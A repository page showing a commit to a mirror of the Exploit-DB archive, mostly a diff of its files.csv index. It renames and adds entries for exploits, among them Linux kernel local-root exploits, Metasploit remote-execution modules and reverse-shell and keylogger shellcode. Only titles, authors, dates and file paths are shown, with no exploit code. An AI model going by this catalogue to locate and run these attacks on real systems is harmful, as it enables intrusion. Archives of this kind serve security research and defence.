bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-06-23

Browse source 
4 new exploits

Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2)
Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2)

Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3)
Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3)

Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1)
Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Local Root Exploit (1)

Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1)
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1)

Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2)
Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (4)

Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3)
Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)

Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4)
Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (2)

Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5)
Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (3)

Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3)
Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - 'Pipe.c' Privilege Escalation (3)

Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation
Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1)

Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit (2)
UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(1)
UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(2)
UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (1)
UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (2)

Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3)
Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Root Exploit (3)

Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1)
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)
Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)
Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)
Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit)
Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)

PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)
PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit)

Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)
Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)

Poison Ivy 2.1.x C2 Buffer Overflow (msf)
Poison Ivy 2.1.x C2 Buffer Overflow (Metasploit)

Bomgar Remote Support Unauthenticated Code Execution (msf)
Bomgar Remote Support Unauthenticated Code Execution (Metasploit)

Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf)
Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)

DarkComet Server Remote File Download Exploit (msf)
DarkComet Server Remote File Download Exploit (Metasploit)
PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)
Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit)
Windows x86 ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode
This commit is contained in:
Offensive Security 2016-06-23 05:06:16 +00:00
parent 0fe9b46f79
commit 412cc0a204
6 changed files with 902 additions and 183 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

50
files.csv
View file

@ -601,7 +601,7 @@ id,file,description,date,author,platform,type,port
774,platforms/php/webapps/774.pl,"Siteman <= 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0
775,platforms/linux/remote/775.c,"Berlios gpsd <= 2.7.x - Remote Format String Vulnerability",2005-01-26,JohnH,linux,remote,2947
776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0
778,platforms/linux/local/778.c,"Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0
778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0
779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0
780,platforms/windows/dos/780.c,"Xpand Rally <= 1.0.0.0 (Server/Clients) - Crash Exploit",2005-01-31,"Luigi Auriemma",windows,dos,28015
781,platforms/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2005-02-01,"Tal Zeltzer",windows,remote,80
@ -714,7 +714,7 @@ id,file,description,date,author,platform,type,port
891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer <= 1.3.21 - Denial of Service Exploit",2005-03-21,"Nico Spicher",windows,dos,0
892,platforms/php/webapps/892.txt,"phpMyFamily <= 1.4.0 Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0
893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0
895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0
895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0
896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0
897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0
898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0
@ -4730,7 +4730,7 @@ id,file,description,date,author,platform,type,port
5090,platforms/php/webapps/5090.pl,"Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0
5091,platforms/php/webapps/5091.pl,"Journalness <= 4.1 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0
5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Local Root Exploit (2)",2008-02-09,qaaz,linux,local,0
5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0
5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0
5094,platforms/php/webapps/5094.txt,"Mambo Component Comments <= 0.5.8.5g SQL Injection Vulnerability",2008-02-09,CheebaHawk215,php,webapps,0
5095,platforms/php/webapps/5095.txt,"PKs Movie Database 3.0.3 - XSS / SQL Injection Vulnerabilities",2008-02-10,Houssamix,php,webapps,0
5096,platforms/php/webapps/5096.txt,"ITechBids 6.0 (detail.php item_id) SQL Injection Vulnerability",2008-02-10,"SoSo H H",php,webapps,0
@ -7984,7 +7984,7 @@ id,file,description,date,author,platform,type,port
8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection Vulnerability",2009-04-17,"Hussin X",php,webapps,0
8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling Vulnerability",2009-04-17,"Hussin X",php,webapps,0
8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0
8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0
8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0
8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0
8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability",2009-04-20,JosS,php,webapps,0
@ -8900,7 +8900,7 @@ id,file,description,date,author,platform,type,port
9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0
9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x (XSS/SQL/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0
9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Local Root Exploit (1)",2009-08-14,spender,linux,local,0
9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (4)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,"Khashayar Fereidani",php,webapps,0
9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 - (competition) SQL Injection Vulnerability",2009-08-14,Mr.SQL,php,webapps,0
9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0
@ -8942,7 +8942,7 @@ id,file,description,date,author,platform,type,port
9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0
9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3)",2009-08-24,"INetCop Security",linux,local,0
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0
9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
@ -9058,7 +9058,7 @@ id,file,description,date,author,platform,type,port
9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0
9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389
9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4)",2009-09-09,"Ramon Valle",linux,local,0
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0
9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0
9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 - (fonctions_racine.php) Remote File Inclusion Vulnerability",2009-09-09,"EA Ngel",php,webapps,0
9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0
@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port
9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0
9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HackeR,php,webapps,0
9640,platforms/php/webapps/9640.txt,"gyro 5.0 (SQL/XSS) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0
9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5)",2009-09-11,"Ramon Valle",linux,local,0
9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0
9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812
9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal Vulnerability",2009-09-11,"Usman Saeed",windows,remote,0
9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80
@ -9232,7 +9232,7 @@ id,file,description,date,author,platform,type,port
9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - (.blend) Command Injection",2009-11-05,"Core Security",multiple,remote,0
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - 'Pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex DoS",2009-11-05,prdelka,osx,dos,0
9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0
9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0
@ -13628,7 +13628,7 @@ id,file,description,date,author,platform,type,port
15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0
15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0
15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0
33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0
15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0
@ -15436,7 +15436,7 @@ id,file,description,date,author,platform,type,port
17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0
17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 - SQL Injection Vulnerability",2011-09-03,"Miroslav Stampar",php,webapps,0
17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion Vulnerability",2011-09-03,"HaCkErS eV!L",php,webapps,0
17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0
17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit (2)",2011-09-05,"Jon Oberheide",linux,local,0
17777,platforms/windows/local/17777.rb,"Apple QuickTime PICT PnSize Buffer Overflow",2011-09-03,metasploit,windows,local,0
17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin <= 4.4 - SQL Injection Vulnerability",2011-09-04,"Miroslav Stampar",php,webapps,0
17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin <= 0.4.8 - SQL Injection Vulnerability",2011-09-05,"Miroslav Stampar",php,webapps,0
@ -16913,8 +16913,8 @@ id,file,description,date,author,platform,type,port
19548,platforms/php/webapps/19548.txt,"gp easy CMS Minishop 1.5 Plugin Persistent XSS",2012-07-03,"Carlos Mario Penagos Hollmann",php,webapps,0
19549,platforms/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",php,webapps,0
19550,platforms/php/webapps/19550.txt,"phpMyBackupPro <= 2.2 - Local File Inclusion Vulnerability",2012-07-03,dun,php,webapps,0
19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(1)",1997-02-13,"Last Stage of Delirium",multiple,local,0
19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(2)",1997-02-13,"Solar Designer",multiple,local,0
19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0
19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (2)",1997-02-13,"Solar Designer",multiple,local,0
19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 mylog/mlog Vulnerability",1997-10-19,"Bryan Berg",php,remote,0
19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0
19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (2)",1998-03-17,Rootshell,hardware,remote,0
@ -30081,7 +30081,7 @@ id,file,description,date,author,platform,type,port
33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0
33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0
33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80
33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 area.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 solic_display.php q_registros Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
@ -35510,7 +35510,8 @@ id,file,description,date,author,platform,type,port
39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Perception Point Team",linux,local,0
39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1)",2016-01-19,"Perception Point Team",linux,local,0
40003,platforms/linux/local/40003.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Federico Bento",linux,local,0
39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
@ -35922,11 +35923,11 @@ id,file,description,date,author,platform,type,port
39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
39723,platforms/lin_x86/shellcode/39723.c,"Linux x86 Shellcode - Bind TCP Port 1472 (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443
39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443
39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
39728,platforms/lin_x86-64/shellcode/39728.py,"Linux x64 - Bind Shell Shellcode Generator",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21
39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win32,remote,21
39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443
39731,platforms/windows/shellcode/39731.c,"Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes",2016-04-25,Fugu,windows,shellcode,0
39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0
@ -36062,7 +36063,7 @@ id,file,description,date,author,platform,type,port
39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)",2016-05-31,"Ian Lovering",windows,remote,0
39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
@ -36094,7 +36095,7 @@ id,file,description,date,author,platform,type,port
39904,platforms/asp/webapps/39904.txt,"Cisco EPC 3928 - Multiple Vulnerabilities",2016-06-07,"Patryk Bogdan",asp,webapps,0
39905,platforms/php/webapps/39905.txt,"Drale DBTableViewer 100123 - Blind SQL Injection",2016-06-08,HaHwul,php,webapps,80
39906,platforms/multiple/dos/39906.txt,"Microsoft Word (Win/Mac) - Crash PoC",2016-06-09,halsten,multiple,dos,0
39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x C2 Buffer Overflow (msf)",2016-06-10,"Jos Wetzels",windows,remote,3460
39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x C2 Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460
39908,platforms/windows/local/39908.txt,"Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation",2016-06-10,"Roland C. Redl",windows,local,0
39909,platforms/xml/webapps/39909.rb,"Dell OpenManage Server Administrator 8.3 - XML External Entity Exploit",2016-06-10,hantwister,xml,webapps,0
39911,platforms/php/webapps/39911.html,"Mobiketa 1.0 - CSRF Add Admin Exploit",2016-06-10,"Murat Yilmazlar",php,webapps,80
@ -36143,7 +36144,7 @@ id,file,description,date,author,platform,type,port
39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80
39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80
